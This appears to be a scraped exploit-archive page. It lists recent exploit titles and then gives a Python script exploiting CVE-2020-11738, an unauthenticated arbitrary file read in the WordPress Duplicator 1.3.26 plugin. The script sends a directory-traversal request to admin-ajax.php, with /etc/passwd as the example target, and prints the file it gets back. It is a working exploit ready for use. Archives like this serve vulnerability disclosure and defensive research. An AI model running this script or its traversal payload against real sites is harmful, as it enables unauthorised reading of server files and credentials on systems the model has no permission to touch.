0a3e0862c8
8 changes to exploits/shellcodes Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS) Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS) Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS) Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS) Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF) Plastic SCM 10.0.16.5622 - WebAdmin Server Access
24 lines
No EOL
730 B
Python
Executable file
24 lines
No EOL
730 B
Python
Executable file
# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
|
|
# Date: October 16, 2021
|
|
# Exploit Author: nam3lum
|
|
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
|
|
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
|
|
# Version: 1.3.26
|
|
# Tested on: Ubuntu 16.04
|
|
# CVE : CVE-2020-11738
|
|
|
|
import requests as re
|
|
import sys
|
|
|
|
if len(sys.argv) != 3:
|
|
print("Exploit made by nam3lum.")
|
|
print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
|
|
exit()
|
|
|
|
arg = sys.argv[1]
|
|
file = sys.argv[2]
|
|
|
|
URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file
|
|
|
|
output = re.get(url = URL)
|
|
print(output.text) |